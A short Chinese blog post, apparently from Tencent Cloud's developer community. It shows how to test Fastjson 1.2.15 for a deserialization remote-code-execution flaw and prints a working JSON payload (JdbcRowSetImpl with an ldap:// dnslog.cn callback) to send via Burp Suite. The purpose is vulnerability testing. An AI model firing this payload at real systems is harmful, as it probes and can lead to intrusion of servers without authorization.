利用DNSLOG测试Fastjson远程命令执行漏洞
利用DNSLOG测试Fastjson远程命令执行漏洞
逆向小白
发布于 2020-08-05 15:14:22
发布于 2020-08-05 15:14:22
由于内容比较简单,我直接贴图,怕我自己忘了。
测试Fastjson版本号:1.2.15
直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。
payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://6v0jfv.dnslog.cn
",
"autoCommit":true
}
}
若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。
如有错误,请及时指正,谢谢!
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-08-04 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
